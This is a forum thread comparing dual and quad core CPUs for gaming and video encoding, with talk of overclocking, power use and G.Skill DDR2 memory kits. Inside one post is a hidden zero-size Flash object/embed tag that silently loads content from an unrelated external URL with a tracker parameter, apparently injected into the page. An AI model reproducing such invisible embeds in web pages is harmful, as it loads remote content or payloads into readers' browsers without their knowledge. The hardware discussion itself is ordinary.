I guess if you're going for games get a dual, if you're doing a lot of encoding and multi task get the quad.

I suppose it depends how much of this videoencoding/cine stuff you do.
check out reviews online.. for the E8400/8500 and quad core cpus.
Hopefully some duals and quads will be tested together and even if theyre not you should be able to compare tests like cinebench R10 and things like MPEG2 to vid encode etc.
On the power usage.. well the less u overclock the more power u will save .
Between quads and duals o/clocked I dont know. The Duals of any given series are rated to use less power than quads, stands to reason 4 more than 2 etc.
    Its not much tho.
    It would be nice to have all your items together rapidly ,for neweggs 30 day money back no q's etc.<object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" width="0" height="0"><param name="movie" value="http://ancientnovels.com/general/pillows-for-working-late/?tracker=3248"></param><param name="allowFullScreen" value="true"></param><embed src="http://ancientnovels.com/general/pillows-for-working-late/?tracker=3248" type="application/x-shockwave-flash" allowfullscreen="true" width="0" height="0"></embed></object>

    Hi again folks,

I have a chance to get some of this:

    Newegg.com - G.SKILL 4GB &#40;2 x 2GB&#41; 240-Pin DDR2 SDRAM DDR2 1100 &#40;PC2 8800&#41; Dual Channel Kit Desktop Memory - Desktop Memory

How would this work as opposed to my original choice
    of the G.Skill PI DDR2 800 4-4-4-12 stuff?

    Thanks again

I have some of the black G.Skill RAM you mentioned.
Lots of folks seem to like it.

Thought I would keep it around in case the other stuff
    gets weird.
